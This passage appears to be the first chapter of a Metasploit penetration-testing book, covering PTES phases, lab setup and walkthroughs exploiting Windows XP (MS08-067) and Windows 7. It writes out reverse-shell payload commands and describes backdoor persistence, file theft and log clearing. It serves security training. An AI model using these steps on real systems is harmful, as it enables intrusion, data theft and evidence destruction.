Penetration testing is an intentional attack on the computer-based system with the intension of finding vulnerabilities, figuring out security weaknesses, certifying that a system is secure, and gaining access to the system by exploiting these vulnerabilities. A penetration test will advise an organization if it is vulnerable to an attack, whether the implemented security is enough to oppose any attack, which security controls can be bypassed, and so on. Hence, a penetration test focuses on improving the security of an organization.
Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered to be one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an extensive exploit development environment, information-gathering and web testing capabilities, and much more.
This book has been written in a manner that it will not only cover the frontend perspectives of Metasploit, but it will also focus on the development and customization of the framework as well. This book assumes that the reader has basic knowledge of the Metasploit framework. However, some of the sections of this book will help you recall the basics as well.
While covering the topics in this book, we will follow a particular process as shown in the following diagram:
This chapter will help you recall the basics of penetration testing and Metasploit, which will help you warm up to the pace of this book.
In this chapter, you will:
Gain knowledge about the phases of a penetration test
Set up a penetration test lab for Metasploit exercises
Recall the basics of the Metasploit framework
Gain knowledge about the working of traditional exploits
Learn about the approach to penetration tests with Metasploit
Gain knowledge about the benefits of using databases
An important point to take a note of here is that we might not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test.
Throughout this chapter, we will dive deep into the fundamentals of penetration testing with Metasploit. We will also cover the traditional good old Metasploit exploits that were commonly used for years since the Metasploit framework was invented. In this chapter, we will look at:
How these good old exploits actually work
What services they target
How a system is compromised using these exploits
When we think about conducting a penetration test on an organization, we need to make sure everything is set perfectly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test:
Refer to the http://www.pentest-standard.org website to set up the hardware and systematic phases to be followed in a work environment; these setups are required to perform a professional penetration test.
Before we start firing sophisticated and complex attack vectors with Metasploit, we must get ourselves comfortable with the work environment. Gathering knowledge about the work environment is really a critical factor, which comes into play before conducting a penetration test. Let's understand the various phases of a penetration test before jumping into Metasploit exercises and see how to organize a penetration test on a professional scale.
The very first phase of a penetration test, preinteractions, involves a discussion of the critical factors regarding the conduct of a penetration test on a client's organization, company, institute, or network; this is done with the client himself or herself. This serves as the connecting line between the penetration tester and the client. Preinteractions help a client get enough knowledge on what is about to be done over his or her network/domain or server. Therefore, the tester here will serve as an educator to the client. The penetration tester also discusses the scope of the test, all the domains that will be tested, and any special requirements that will be needed while conducting the test on the client's behalf. This includes special privileges, access to critical systems, and so on. The expected positives of the test should also be part of the discussion with the client in this phase. As a process, preinteractions discuss some of the following key points:
Scoping: This section discusses the scope of the project and estimates the size of the project. Scope also defines what to include for testing and what to exclude from the test. A tester also discusses ranges and domains under the scope and the type of test (black box or white box) to be performed. For white box testing, what all access options are required by the tester? Questionnaires for administrators, time duration for the test, whether to include stress testing or not, and payment for setting up the terms and conditions are included in the scope.
For more information on preinteractions, refer to http://www.pentest-standard.org/index.php/File:Pre-engagement.png.
In the intelligence gathering phase, you need to gather as much information as possible about the target network. The target network can be a website, an organization, or might be a full-fledged fortune company. The most important aspect is to gather information about the target from social media networks and use Google dorks (a way to extract sensitive information from Google using specialized queries) to find sensitive information related to the target. Foot printing the organization using active and passive attacks can also be an approach.
The intelligence phase is one of the most crucial phases in penetration testing. Properly gained knowledge about the target will help the tester to stimulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help him or her save an ample amount of time as well. This phase will consume 40 to 60 percent of the total time of the testing, as gaining access to the target depends largely upon how well the system is foot printed.
It's the duty of a penetration tester to gain adequate knowledge about the target by conducting a variety of scans; scanning for services, looking for open ports, and identifying all the services running on those ports, and also to decide which services are vulnerable and how to make use of them to enter into the desired system.
The procedures followed during this phase are required to identify the security policies that are currently set in place at the target, and what can we do to breach them.
Let's discuss this using an example. Consider a black box test against a web server, where the client wants to get his or her network tested against stress testing. Here, we will be testing a server to see what level of stress it can bear, or in simple terms, how the server is responding to the Denial of Service (DoS) attack. A DoS attack or a stress test is the name given to the procedure of sending indefinite requests or data to a server in order to check whether the server handles all the requests successfully or goes down issuing a denial of service.
In order to achieve this, we start our network stress-testing tool and launch an attack towards a target website. However, after a few seconds of launching the attack, we see that the server is not responding to our browser and the website does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Not at all. In reality, it is a sign of protection mechanism, which is set in place by the server administrator that sensed our malicious intent of taking the server down, and it bans our IP address. Hence, we must collect correct information and identify various services at the target before launching an attack.
Therefore, the better approach can be to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is a good approach. In addition, I advise you to test all the attack vectors under a virtual environment before launching these attack vectors onto the real targets. A proper validation of the attack vectors is mandatory because if we do not validate the attack vectors prior to the attack, it may crash the service at the target, which is not favorable at all.
Now, let's look at the second example. Consider a white box test against a Windows 2000 server. We know that the server is vulnerable to the very common vulnerability in the Windows 2000 server, that is, the distributed component object model (DCOM) exploit. However, when we try to attack it, we do not get the option to access it. Instead, we get an error indicating that the connection is failed or a connection to the given remote address cannot be established. Most likely, this happens because of the use of an added third-party firewall, which blocks the traffic and doesn't let us enter the system premises.
In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system, rather than us connecting to the server directly. This is because there might be a possibility that the outbound traffic may not be highly filtered compared to the inbound traffic.
This phase involves the following procedures when viewed as a process:
Covert gathering: This involves on-location gathering, the equipment in use, and dumpster diving. Also, it covers off-site gathering that involves data warehouses' identification; this phase is generally considered during a white box penetration test.
For more information on gathering intelligence, refer to http://www.pentest-standard.org/index.php/Intelligence_Gathering.
It happens most of the times throughout a penetration tester's life that when he or she starts testing an environment, he or she knows what to do next. What it means is that if he or she sees a Windows box running, he or she switches his approach towards the exploits that works perfectly for Windows. An example of this might be an exploit for the NETAPI vulnerability, which is the most favorable choice for testing a Windows XP box. Suppose, he or she needs to visit an organization, and before going there, he or she comes to know that 90 percent of the machines in the organization are running on Windows XP, and some of them use Windows 2000 Server. He or she quickly builds a mindset that he or she will be using the NETAPI exploit for XP-based systems and the DCOM exploit for Windows 2000 server from Metasploit to successfully complete the testing phase. However, we will also see how we can use these exploits practically in the latter phase of this chapter.
Consider another example of a white box test on a web server where the server is hosting ASP and ASPX pages. In this case, we switch our approach to use Windows-based exploits and Internet Information Services (IIS) testing tools. Therefore, ignoring the exploits and tools for Linux.
Hence, presensing the environment under a test provides an upper hand to build a strategy of the test that we need to follow at the client's site.
For more information on the NETAPI vulnerability, visit http://technet.microsoft.com/en-us/security/bulletin/ms08-067.
For more information on the DCOM vulnerability, visit http://www.rapid7.com/db/modules/exploit/Windows /dcerpc/ms03_026_dcom.
In order to conduct a correct penetration test, threat modeling is required. This phase focuses on modeling out correct threats, their effect, and their categorization based on the impact they can cause. However, based on the analysis made during the intelligence-gathering phase, we can model out the best possible attack vectors for a target in this phase. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions:
How can we attack a particular network?
What is the crucial data we need to gain access to?
What approach is best suited for the attack?
What are the highest-rated threats?
Modeling threats will help a penetration tester to perform the following set of operations:
Gather relevant documentation about high-level threats
Identify an organization's assets on a categorical basis
Identify and categorize threats
Mapping threats to the assets of an organization
Modeling threats will help to define assets of the highest priority with threats that can influence these assets.
Now, let's discuss the third example. Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. However, it is also possible that in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database. Hence, transaction records are the secondary asset. Therefore, mapping a SQL injection attack to primary and secondary assets is achievable during this phase.
Vulnerability scanners such as Nessus can help model out threats clearly and quickly using the automated approach. This can prove to be handy while conducting large tests.
For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Threat_Modeling.
Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from a server to web application, an insecure application design to vulnerable database services, and a VOIP-based server to SCADA-based services. This phase generally contains three different mechanisms, which are testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping the false positives and confirming the existence of vulnerability through manual validations. Research refers to verifying a vulnerability that is found and triggering it to confirm its existence.
For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Vulnerability_Analysis.
The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This phase is considered to be the actual attack phase. In this phase, a penetration tester fires up exploits at the target vulnerabilities of a system in order to gain access. This phase is covered majorly throughout the book.
The post-exploitation phase is the latter phase of exploitation. This phase covers various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on.
For more information on the processes involved during the exploitation phase, refer to http://www.pentest-standard.org/index.php/Exploitation. For more information on post exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation.
Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this book.
For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Reporting.
Before going to a war, the soldiers must make sure that their artillery is working perfectly. This is exactly what we are going to follow. Testing an environment successfully depends on how well your test labs are configured. Moreover, a successful test answers the following set of questions:
How well is your test lab configured?
Are all the required tools for testing available?
How good is your hardware to support such tools?
Before we begin to test anything, we must make sure that all the required set of tools are available and everything works perfectly.
Before mingling with Metasploit, we need to have a test lab. The best idea for setting up a test lab is to gather different machines and install different operating systems on it. However, if we only have a single machine, the best idea is to set up a virtual environment. Therefore, let's see how we can set up an example virtual environment.
We need two operating systems: Backtrack/Kali Linux and Windows XP/7. We will be using Backtrack/Kali Linux to test Windows XP/7 systems.
In addition, virtualization plays an important role in penetration testing today. Due to the high cost of hardware, virtualization plays a cost-effective role in penetration testing. Emulating different operating systems under the host operating system not only saves you the cost but also cuts down on electricity and space. However, setting up a virtual penetration test lab prevents any modifications on the actual host system and allows us to perform operations on an isolated environment. A virtual network allows network exploitation to run on an isolated network, thus preventing any modifications or the use of network hardware of the host system.
Moreover, the snapshot feature of virtualization helps preserve the state of the virtual machine at a particular interval of time. This proves to be very helpful, as we can compare or reload a previous state of the operating system while testing a virtual environment.
For more information on snapshots, refer to http://kb.vmware.com/kb/1015180.
So, let's see how we can create a virtual environment with two operating systems. In this scenario, we will install a Windows XP box and a Kali operating system on the virtual environment. However, to create virtual operating systems, we need virtual emulator software. We can use any one between two of the most popular ones: VirtualBox and VMware player. So, let's begin with the installation by performing the following steps:
Download the VirtualBox (http://www.virtualbox.org/wiki/Downloads) setup according to your machine's architecture.
Run the setup and finalize the installation.
Now, after the installation, run the VirtualBox program as shown in the following screenshot:
Now, to install a new operating system, select New.
Type an appropriate name in the Name field and select the Operating System type and Version, as follows:
However, this may look something similar to what is shown in the following screenshot:
Select the amount of system memory to allocate, typically 512 MB for Windows XP and at least 1GB for Kali Linux.
The next step is to create a virtual disk which will serve as a hard drive to the virtual operating system. Create the disk as a dynamically allocated disk. Choosing this option will consume space just enough to fit the virtual operating system rather than consuming the entire chunk of physical hard disk of the host system.
The next step is to allocate the size for the disk; typically, 10 GB space is enough.
Now, proceed to create the disk, and after reviewing the summary, click on Create.
Now, click on Start to run. For the very first time, a window will pop up showing the first run wizard; proceed with it and select the Windows XP /Kali OS by browsing to the location of the
.isofile from the hard disk. This process may look similar to what is shown in the following screenshot:
Proceed with the installation procedure if you are using a different machine.
Windows XP will be installed normally. Repeat the same with Kali Linux, but remember to set Operating System as Linux and Version as Ubuntu or Other kernel 2.6.
Now that we've recalled the basic phases of a penetration test and completed the setup of a virtual test lab, let's talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has lead it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features.
Metasploit comes in various different editions, as follows:
Throughout this book, we will be using the Metasploit community edition. Metasploit also offers various types of user interfaces, as follows:
The GUI interface: The graphical user interface has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management.
The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. This interface is also considered to be one of the most stable interfaces. Throughout this book, we will be using the console interface the most.
The command-line interface: The command-line interface is the most powerful interface that supports the launching of exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job.
Armitage: Armitage by Raphael Mudge added a cool hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortana scripting. An entire chapter is dedicated to Armitage and the Cortana scripting in the latter half of this book.
For more information on the Metasploit community, refer to https://community.rapid7.com/community/metasploit/blog/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community.
We can configure Metasploit under both Linux and Windows environments. However, we can set up connections for remotely configured Metasploit too. We can use Metasploit in the following scenarios:
Metasploit for Windows
Metasploit for Ubuntu
Metasploit with SSH access
It is easy to set up Metasploit on a Windows environment. Download the installer from Metasploit's official website and simply run the setup in the same way as you would with any other Windows-based tool. However, Metasploit on Windows requires a great deal of security protections that we need to turn off. Therefore, it is less favorable to install Metasploit on Windows than a Linux-based installation.
There are two different editions of Metasploit: the community edition and pro edition. The pro edition is chargeable, but it is a fully featured framework with many options. The community edition, on the other hand, is free, but in this edition, some add-ons are missing. All those who want to get a fully featured piece of Metasploit software can go for the pro edition. However, if it's only for the sake of learning, you can go with the Metasploit community edition and can explore the various features of it.
You can download Metasploit for both Linux and Windows at http://www.rapid7.com/products/metasploit/download.jsp.
Do not forget to disable your antivirus and firewall before installing Metasploit; otherwise, your antivirus will delete many exploits considering it malicious.
To disable or enable ASLR protection, change the value of the registry key located at the following path:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages
Setting up Metasploit on Ubuntu 12.04 LTS is a really easy job. Simply download the latest version of Ubuntu from Ubuntu's official website and install it on a different machine; alternatively, repeat the process in a virtual environment as we did for Backtrack-Linux.
After downloading the Linux-based installer, simply perform the following steps:
Open the terminal and browse to the directory of the Metasploit installer, as shown in the following screenshot:
chmod +x Metasploit-latest-linux-installer.run
The preceding command enables the execution of this file by all, that is, user, groups, and the world.
Now, simply execute this file using
./[File-Name], which in our case will be
Now, a simple GUI-style installation interface will pop up, and we need to proceed with it as shown in the following screenshot:
The next step relates to the license agreement, and after agreeing to it, we get the option to choose a folder for the Metasploit installation. By default, it is
/opt/Metasploit. Leave it as is and proceed with the installation.
The next option is to confirm whether Metasploit will be installed as a service or not. The idea behind this is that Metasploit will automatically get initialized when the system boots up, so we choose to install it as a service and proceed to the next step, as shown in the following screenshot:
The next step is to make sure that you have turned off your firewall and antivirus before Metasploit proceeds with the installation. This is important because if firewall is turned on, it might block the connections for Metasploit, and the antivirus might detect many modules as malicious. To avoid deletion and detection of modules by the antivirus, we choose to turn off the antivirus protection and firewall.
Next, you need to choose the port that Metasploit will use. Leave it as it is, unless it is used by some other application. Then, you generate a Secure Socket Layer (SSL) certificate to provide secure connections to the framework.
If everything works fine, we will see the installation window with a progress bar as shown in the following screenshot:
After the successful installation of Metasploit, we can simply open the terminal and type
msfconsoleto set up the console interface of Metasploit. Then, we can start with our work as shown in the following screenshot:
The latest edition of Ubuntu can be downloaded from http://www.ubuntu.com/download/desktop.
You can refer to an excellent tutorial on SSH access at http://rumyittips.com/configure-ssh-server-on-kali-linux/.
Sometimes it may happen that we face some installation errors while installing the Metasploit framework on the system. However, we will see how we can deal with these errors. Errors might occur during a Windows as well as Linux-based installation. However, these are easy to overcome if dealt with properly.
Register on https://community.rapid7.com/ for more information on support issues.
The most common error to occur in a Windows-based installation is the database error where the database refuses to provide connections to configure Metasploit's connectivity. This might occur in cases where the PostgreSQL server might not be working; sometimes it can occur in cases where Metasploit is not correctly installed in the default directory.
Try to manually start the PostgreSQL server, then type
services.mscin the run prompt, and finally find and start the
Install Metasploit in the default directory
In a Linux-based installation, errors might occur due to broken file dependencies and can lead to the failure of the installation. If the installation fails, we can fix these dependencies manually and can configure Metasploit manually through the terminal by downloading and installing the correct dependencies.
To download all the dependencies needed by Metasploit, we can use the following command:
$sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby1.9.3
The preceding command will download all the essential dependencies such as build-essentials, Ruby, PostgreSQL, and all the other major dependencies required by Metasploit.
In case the error is part of the Ruby libraries, we can use the following command to install all the essential Ruby libraries used my Metasploit:
$sudo gem install wirble sqlite3 bundler
To install Metasploit completely from the command line, refer to http://www.darkoperator.com/installing-metasploit-in-ubunt/.
After setting up the work environment, we are now ready to perform our first penetration test with Metasploit. However, before we start with the test, let's recall some of the basic functions and terminologies used in the Metasploit framework.
After we run Metasploit, we can list down all the workable commands available in the framework by typing
help in Metasploit console. Let's recall the basic terms used in Metasploit, which are as follows:
Let's now recall some of the basic commands of Metasploit and see what they are supposed to do as shown in the following table:
To select a particular module to start working with
To see the list of available modules of a particular type
To set a value to a particular object
msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 220.127.116.11
To set a value to a particular object globally so the values do not change when a module is switched on
msf>setg payload windows/meterpreter/reverse_tcp msf>setg LHOST 18.104.22.168
To launch an auxiliary module after all the required options are set
To launch an exploit
To unselect a module and move back
To list the information related to a particular exploit/module/auxiliary
To find a particular module
To check whether a particular target is vulnerable to the exploit or not
To list the available sessions
msf>sessions [session number]
If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands for more information on basic commands.
Recalling the basics of Metasploit, we are all set to perform our first penetration test with Metasploit. We will test an IP address here and try to find relevant information about the target IP. We will follow all the required phases of a penetration test here, which we discussed in the earlier part of this chapter.
Considering a black box penetration test on a Windows XP system, we can assume that we are done with the preinteraction phase. We are going to test a single IP address in the scope of the test, with no prior knowledge of the technologies running on the target. We are performing the test with Kali Linux, a popular security-based Linux distribution, which comes with tons of preinstalled security tools.
As discussed earlier, the gathering intelligence phase revolves around gathering as much information as possible about the target. Active and passive scans that include port scanning, banner grabbing, and various other scans depends upon the type of target that is under test. The target under the current scenario is a single IP address, located in a local network. So here, we can skip passive information gathering and can continue with the active information-gathering methodology.
To conduct internal FootPrinting, NMAP proves as one of the finest available tool. Let's perform a simple ping scan with NMAP on the target to check whether the target is online or not, as shown in the following screenshot:
The usage of the
-sP switch in NMAP followed by the IP address of the target will direct NMAP to perform a ping scan over the target. NMAP not only tells us whether the system is alive or not, but it also displays the MAC address of the target by sending an ARP request. However, if the target blocks ICMP packets, NMAP ping scan automatically switches the approach by changing from ICMP to TCP-based packets.
Once you're done with the ping scan, it is very clear that the target in scope is online.
The next step is to find out information regarding the operating system and open ports. Port scanning is the method of finding open ports and identifying running services on ports that are found. NMAP offers a variety of scan methods used to identify open ports. Using the
-O switch will direct NMAP to perform operating system detection, device type identification, network distance, open ports, and services running on them. This NMAP scan is famous by the name of operating system detection type scan. Let's see how we can perform this type of scan on the target:
The output of the scan lists various services found on the open ports as well as the OS details of the target. Therefore, at this point, we know that the target is up. Ports 80, 135, 139, 443, 445, and 3306 are open. The target is running on Windows XP Professional SP2 or Windows Server 2003. However, it may happen that the OS details are not correct every time. So, to confirm this, use other operating system fingerprinting tools such as Xprobe2, p0f, and so on.
Refer to http://nmap.org/bennieston-tutorial/ for more information on NMAP scans.
Refer to http://null-byte.wonderhowto.com/how-to/hack-like-pro-conduct-os-fingerprinting-with-xprobe2-0148439/ for operating system detection scans with Xprobe2.
Refer to an excellent book on NMAP at http://www.packtpub.com/network-mapper-6-exploration-and-security-auditing-cookbook/book.
From the preceding phase, we know that the operating system is either Windows XP Professional SP2 or the Windows 2003 server. Explore the vulnerabilities on Windows XP systems or Windows 2003 servers via http://www.cvedetails.com/product/739/Microsoft-Windows-Xp.html and http://www.cvedetails.com/product/2594/Microsoft-Windows-2003-Server.html?vendor_id=26 respectively, and match the vulnerabilities with the ports that are found. It can be concluded that majority of these groups of operating systems are vulnerable to attack on port 445. Due to the NETAPI vulnerability on port 445, this can lead to a complete system compromise. However, a vulnerability check on third-party software such as Apache and MySQL must be part of the checklist as well.
Categorizing this vulnerability as high risk, all the other found threats need to be in the list according to the factors of their impact.
At this point of the test, we know that from the list of open ports, port number 445 is vulnerable to a high-risk attack on Windows XP professional or Windows 2003.
Refer to http://www.cvedetails.com/product-list/product_type-o/vendor_id-26/firstchar-/Operating-Systems.html for more information on various vulnerabilities in Windows-based operating systems.
Modeling out threats, let's consider the NETAPI vulnerability and discuss some of its details. However, the details of the vulnerability are available at http://www.cvedetails.com/cve/CVE-2008-4250/, which includes information on how operating systems are affected, links to hot fixes, and so on. Rapid7 also documents this vulnerability and its related exploit at http://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi.
The users of Metasploit are only concerned with exploitation; however, we will still discuss the inside story behind the attack on this vulnerability. We must know what we are doing and how we are doing it. This will help us strengthen our exploitation skills.
The concept of this attack is the absence of Address Space Layout Randomization (ASLR) usage in the previous and older versions of Windows operating systems. ASLR is responsible for loading a program dynamically into the memory, which means at a different place every time. Operating systems such as Windows XP SP1, XP SP2, 2003 Server, and so on, do not use ASLR. So the nonusage of ASLR makes Data Execution Prevention (DEP) vulnerable to an attack. The canonicalization flaw in the
NETAPI32.dll file in Windows allows the attacker to bypass the DEP protection and overwrite the return addresses and various registers.
The exploit code in this attack makes a connection with the target first. Further, it creates a Server Message Block (SMB) login connection at the lower transport layer. Now, the specially crafted Remote Procedure Call (RPC) request overwrites the return addresses on the stack and sets the attacker's desired address to it. ShellCode is placed after the overwriting of the return address; after this is done, the program counter is adjusted in such a way that it points to the ShellCode. After the execution of ShellCode, the attacker gets back to the session. Some of the terms might look scary here, but things will get clearer as we move ahead.
Therefore, at this point, we have enough knowledge about the vulnerability, and we can go further with the exploitation of the vulnerability.
Let's see how we can actually exploit the target that has a modelled-out threat with Metasploit. Let's launch the Metasploit console interface and search for the
ms08_067_netapi exploit by typing the following command:
While executing the preceding command, we will see so many different versions of the exploit. However, we will start our approach with the
ms08 version of the exploit. We selected this version of the exploit because we have the corresponding CVE details from the year 2008. Therefore, we proceed by selecting the
ms08_067_netapi exploit using the
use command as follows:
msf>use exploit/Windows /smb/ms08_067_netapi
The IP address of the remote host to be exploited
The remote port to be connected to
What action to perform upon a successful exploitation
The IP address of the attacker machine
The port of the attacker machine that will handle communications, which the reverse shell will connect to on the target system
4444 (set as default)
Used to specify how the process is to be terminated in case of a failure, crash, or normal exit (default)
Used to select a particular pipe to be used when setting up the communication and Inter Process Communication (IPC) (default)
A Metasploit module that is composed of a variety of post-exploitation functions
Let's now run the exploit against the target:
We are skipping the process of setting the values that are active by default. To check which default values are active, type the
show options or
show advanced command.
By setting up all the required parameters as shown in the preceding screenshot, we choose to exploit the system and gain access to the target by issuing the
We can see the prompt changing to meterpreter. This denotes a successful payload execution and marks the exploit's success.
Next, we issue
getpid to find out the current privileges' level and the current process we have broken into.
Consider a scenario where the user of a target machine terminates the process. In this case, the access will be lost, and we will need to relaunch the entire attack. To overcome this issue, we can migrate from this process into a more reliable process with the help of the
migrate command. A more reliable process can be the main process in Windows, which is
explorer.exe. However, to migrate, we need to have the process ID of the
explorer.exe process. We can find out the process ID for
explorer.exe with the
ps command. By finding out the process ID of the process in which we wish to jump into, we can issue the
migrate command followed by the process ID of the process, as shown in the following screenshot:
We can verify the migration process by issuing the
getpid command again. Moreover, we can see that meterpreter shows us the current process ID of the
explorer.exe process. This denotes successful migration of the shell into the
explorer.exe process. However, as soon as we try issuing the
getuid command, it shows that we only have user-level access. This is because we migrated into a user-initiated process,
explorer.exe. However, we can gain system-level access back again by issuing the
Now, let's perform some of the basic post-exploitation functions such as removing a directory with the
rmdir command, changing a directory with the
cd command, listing the contents of a directory with the
ls command, and downloading a file with the
download command, as shown in the following screenshot:
If you closely look at the preceding screenshot, you'll realize that we removed a directory named
Confidential-Client with the
rmdir command. Then, we downloaded a file present in the
Market-Data directory named
data.txt with the
Maintaining access is crucial because we might need to interact with the hacked system repeatedly. So, in order to achieve this, we can add a new user to the hacked system, or we can use the
persistence module from Metasploit. Running the
persistence module will make the access to the target system permanent by installing a permanent backdoor to it. Therefore, if in any case the vulnerability patches, we can still maintain the access on that target system, as shown in the following screenshot:
persistence module will upload and execute a malicious
.vbs script on the target. The execution of this malicious script will cause a connection attempt to be made to the attacker's system with a gap of every few seconds. This process will also be installed as a service and is added to the start up programs list. So, no matter how many times the target system boots, the service will be installed permanently. Hence, its effect remains unless the service is uninstalled or removed manually.
In order to connect to this malicious service at the target and regain access, we need to set up a multi/handler. A multi/handler is a universal exploit handler used to handle incoming connections initiated by the executed payloads at the target machine. To use an exploit handler, we need to issue commands as shown in the following screenshot, from the Metasploit framework's console:
A key point here is that we need to set the same payload and the LPORT option, which we used while running the
After issuing the
exploit command, the multi/handler starts to wait for the connection to be made from the target system. As soon as an incoming connection gets detected, we are presented with the meterpreter shell.
After a successful breach into the target system, it is advisable to clear every track of our presence. In order to achieve this, we need to clear the event logs. We can clear them with the event manager module as follows:
At this point, we end up with the penetration testing process for the Windows XP environment and can continue with the report generation process. In the preceding test, we focused on a single vulnerability only, just for the sake of learning. However, we must test all the vulnerabilities to verify all the potential vulnerabilities in the target system.
Windows Server 2003 can be tested in exactly the same way as we did for Windows XP. This is because both the operating systems fall under the same kernel code set. However, make sure that repeated attempts to exploit a Windows Server 2003 could cause the server to crash. Therefore, both the Windows XP and Windows Server 2003 are found vulnerable to the NETAPI-based vulnerability. However, the vulnerabilities in IIS and old instances of MSSQL can be additionally tested within the scope of the test.
Let's try out the same exploit for Windows Server 2003 as follows:
Additionally, we can use the client-based exploitation approach here as well. We will study about client-based exploitation in the latter chapters. However, I leave Windows Server 2003 as an exercise for you.
Let's move further and test a much more advanced operating system in terms of security policies.
Exploiting a Windows 7 system is much more difficult than the previously discussed operating systems. This is due to the complex architecture of windows 7, the implementation of much greater security policies such as usage of ASLR, and much more advanced firewalls.
So, how can we attack Windows 7 systems? The answer to this question is by exploiting third-party applications in use or the client-based exploitation.
Let's start by port scanning the target system. This time, however, let's perform a stealth scan by defining the
–sS switch. Half-open scan/ Syn scan is another name given to the stealth scan because it only completes two of the three phases of a TCP's three-way handshake. Therefore, it creates less noise on the network. Let's also provide a few commonly found open ports with the
–p switch. However, using this switch will instruct NMAP to only test these ports and skip every other port as shown in the following screenshot:
After scanning the target at ports 21, 22, 25, 80, 110, and 445, we can only see port 80 and port 445 open.
At this point, we know that the target is up and running. We also know that port 80 and port 445 are open. Repeating the OS fingerprinting process from the previous scan on the windows XP system, we can conclude that the IP address is running Windows 7. I skip this step for you to encourage self-exploration.
We will use another type of scan here to identify services. This scan is known as service detection scan and is denoted by the
–sV switch. We already know that port 445, by default, runs the
microsoft-ds service, so we skip checking it. Therefore, the only port under exploration is port 80. We instruct NMAP in the preceding command to perform a service detection scan only on port 80 by specifying it using the
Let's move further and figure out which service is running on port 80 along with its version, as shown in the following screenshot:
From the gathering intelligence phase, we know that port 80 and port 445 are open at the target premises. Additionally, we also know that port 80 is running PMSoftware Simple Web Server 2.2 and port 445 is running the
Microsoft-ds service. Exploring the CVE details about the service running on port 445, we can easily figure out that Windows 7 operating system is free from the bug that was the most common bug in Windows XP/2003 operating systems. At this point of the test, we only have port 80 to attack. So, let's gather details about this vulnerability via http://www.osvdb.org/84310. Exploring the vulnerability details, we can see that a public exploit is available for this version of the HTTP server.
Details about the exploit can be found at http://www.rapid7.com/db/modules/exploit/windows/http/sws_connection_bof.
A simple web server connection buffer overflow vulnerability can allow an attacker to send a malicious HTTP request in the HTTP
Connection parameter to trigger a buffer overflow in the application and gain access to the system.
A vulnerability is triggered when we send an
HTTP/GET/1.1 request along with other parameters such as
Host. We supply the target IP as host. However, when it comes to the
Connection parameter, we supply enough junk data to possibly crash the buffer and fill up the remaining registers with our custom values. These custom values will overwrite Extended instruction pointer (EIP) and other registers that will cause a redirection in the program. Therefore, it will redirect the execution of the program and present us with the entire control of the system. The overflow actually occurs when this malicious request is tried to be printed by the software using the
vsprintf() function, but instead, ends up filling the buffer and space beyond the limits of the buffer. This overwrites the values of EIP that holds the address of the next instruction and other registers with values supplied in the request itself.
Taking a step further, let's exploit the target system using the vulnerability.
After launching the Metasploit framework, we issue the
use command followed by the path of the exploit to start working with the exploit. We move further by exploiting the target after setting all the required options and the payload, as shown in the following screenshot:
Bingo! We made it. We successfully exploited a Windows 7 system with a third-party application. Let's verify the target system by issuing the
sysinfo command from meterpreter in order to verify the details of Windows 7.
Furthermore, we can elevate privileges, gain system-level access, run backdoors, and download/upload files to the exploited system easily. I leave these post-exploitation features as an exercise for you to complete.
It is always a better approach to store the results when you perform penetration testing. This will help us build a knowledge base about hosts, services, and the vulnerabilities in the scope of a penetration test. In order to achieve this functionality, we can use databases in Metasploit.
The latest version of Metasploit favors
PostgreSQL as the default database. However, some users face many problems with it. The most common problem is the database not connected error. In order to address this issue, open a terminal and issue the following commands:
#services postgresql start #services metasploit start
Now, restart Metasploit, and you will see that the error no longer exists.
After solving database issues, let's take one step further and start with database operations. To find out the status of the databases, open the Metasploit framework's console and type the following command:
The preceding command will check whether the database is connected and is ready to store the scan results or not, as shown in the following screenshot:
However, typing only the preceding command will display its usage methods as we can see in the following screenshot:
In order to connect to a database, we need to supply a username, password, and a port with the database name along with the
